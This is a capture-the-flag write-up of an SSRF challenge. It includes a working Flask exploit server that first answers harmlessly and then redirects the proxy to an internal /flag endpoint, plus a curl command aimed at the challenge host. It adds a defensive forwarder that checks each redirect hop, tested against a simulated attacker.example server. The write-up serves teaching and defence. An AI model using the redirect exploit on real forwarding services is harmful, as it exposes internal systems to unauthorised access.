Social Engineering Experts CTF 2022: Super Secure Requests Forwarder
TL;DR
- The service blindly forwards requests to user-supplied URLs.
- It assumes a URL is safe after a single benign request.
- Host a server that behaves differently on subsequent requests.
- First response looks harmless, second response issues a redirect to 127.0.0.1.
- The proxy follows the redirect and fetches the internal /flag endpoint.
Video Walkthrough
Description
Hide your IP address and take back control of your privacy! Visit websites through our super secure proxy.
Solution
Exploit server (Flask): the first request to /exploit returns a harmless page, the second answers with a 302 to the internal flag endpoint, which the proxy follows.

from flask import Flask, redirect, request

# flask run
# ngrok http 5000
# curl -X POST -d "url=http://c0ac-81-103-153-174.ngrok.io/exploit" http://ssrf.chall.seetf.sg:1337/

app = Flask(__name__)
check = True  # toggles between the benign and the redirecting response


@app.route("/")
def index():
    return "<a href='https://www.youtube.com/c/CryptoCat23'>👀</a>"


@app.route("/exploit", methods=['GET', 'POST'])
def handle():
    global check
    if check:  # First request = benign
        check = False
        return "First request is benign, why wouldn't the second be?!"
    else:  # Second request = malicious
        check = True
        return redirect("http://127.0.0.1/flag", code=302)
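The fix on the forwarder's side is to stop treating "one harmless response" as proof of anything and instead validate the destination of every request it actually makes, including each hop of a redirect chain. The block below is an added example written for this writeup, not code from the challenge or its author: it models the challenge's probe-once logic next to a forwarder that resolves and checks each hop before fetching it. The names is_safe_target, fetch_with_revalidation, forward_probe_once and FakeNetwork, the host attacker.example, the address 1.2.3.4 and the flag string are all constructed for the illustration. One caveat a practitioner should keep in mind: the check resolves the hostname separately from the HTTP client that later connects, so a DNS answer that changes between the two lookups (rebinding) still needs the connection pinned to the validated address; that step is not shown here.

```python
# Added example (not from the writeup or the challenge): a forwarder that
# re-validates every redirect hop, beside a model of the probe-once flaw.
# is_safe_target, fetch_with_revalidation, forward_probe_once and FakeNetwork
# are names made up for this illustration.
import ipaddress
import socket
from urllib.parse import urljoin, urlsplit

REDIRECT_CODES = {301, 302, 303, 307, 308}
MAX_REDIRECTS = 5


def default_resolver(host):
    """Resolve a hostname to every address string it maps to (v4 and v6)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_safe_target(url, resolver=default_resolver):
    """Return (ok, reason). Only http/https is allowed and every address the
    host resolves to must be globally routable: loopback, RFC 1918,
    link-local (cloud metadata) and other special ranges are refused."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed"
    if not parts.hostname:
        return False, "missing host"
    try:
        addrs = resolver(parts.hostname)
    except (socket.gaierror, ValueError):
        return False, "host does not resolve"
    for text in addrs:
        addr = ipaddress.ip_address(text)
        if not addr.is_global:
            return False, f"{parts.hostname} resolves to non-public {addr}"
    return True, "ok"


def fetch_with_revalidation(url, fetch, resolver=default_resolver):
    """Follow redirects by hand, validating each hop before it is fetched.
    `fetch(url)` must not follow redirects itself (with requests that is
    requests.get(url, allow_redirects=False)) and returns
    (status, headers, body)."""
    for _ in range(MAX_REDIRECTS + 1):
        ok, reason = is_safe_target(url, resolver)
        if not ok:
            raise PermissionError(f"refusing {url}: {reason}")
        status, headers, body = fetch(url)
        location = headers.get("Location")
        if status in REDIRECT_CODES and location:
            url = urljoin(url, location)  # Location may be relative
            continue
        return status, body
    raise RuntimeError("too many redirects")


def forward_probe_once(url, fetch, fetch_following_redirects):
    """Model of the challenge's flaw: one probe request decides the URL is
    harmless, then the real request is made with a client that follows
    redirects on its own. Whatever the server does on the second request
    is never checked."""
    status, _headers, _body = fetch(url)
    if status in REDIRECT_CODES:
        raise PermissionError("probe returned a redirect")
    status, _headers, body = fetch_following_redirects(url)
    return status, body


class FakeNetwork:
    """Constructed offline stand-in for DNS and HTTP: a server that is benign
    on its first hit and redirects to the internal /flag endpoint afterwards."""

    def __init__(self):
        self.hits = 0
        # constructed records: a public-looking attacker host and loopback
        self.hosts = {"attacker.example": ["1.2.3.4"], "127.0.0.1": ["127.0.0.1"]}

    def resolve(self, host):
        if host not in self.hosts:
            raise socket.gaierror(f"unknown host {host}")
        return self.hosts[host]

    def fetch(self, url):
        """One HTTP request, no redirect following."""
        if urlsplit(url).hostname == "127.0.0.1":
            return 200, {}, "SEE{constructed-sample-flag}"
        self.hits += 1
        if self.hits == 1:
            return 200, {}, "first request is benign"
        return 302, {"Location": "http://127.0.0.1/flag"}, ""

    def fetch_following_redirects(self, url):
        """What a default HTTP client does: follow Location headers blindly."""
        status, headers, body = self.fetch(url)
        while status in REDIRECT_CODES and headers.get("Location"):
            url = urljoin(url, headers["Location"])
            status, headers, body = self.fetch(url)
        return status, headers, body


if __name__ == "__main__":
    net = FakeNetwork()
    print(forward_probe_once("http://attacker.example/exploit", net.fetch,
                             net.fetch_following_redirects))  # internal body leaks
    net = FakeNetwork()
    print(fetch_with_revalidation("http://attacker.example/exploit", net.fetch, net.resolve))
    try:
        fetch_with_revalidation("http://attacker.example/exploit", net.fetch, net.resolve)
    except PermissionError as err:
        print("blocked:", err)
```

Running the block shows the contrast: the probe-once forwarder returns the internal endpoint's body, while the re-validating forwarder serves the benign first response and refuses the second because the redirect target resolves to loopback. The same `is_safe_target` check also rejects non-HTTP schemes and names that do not resolve, which covers the other common ways a forwarder gets pointed somewhere it should not go.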
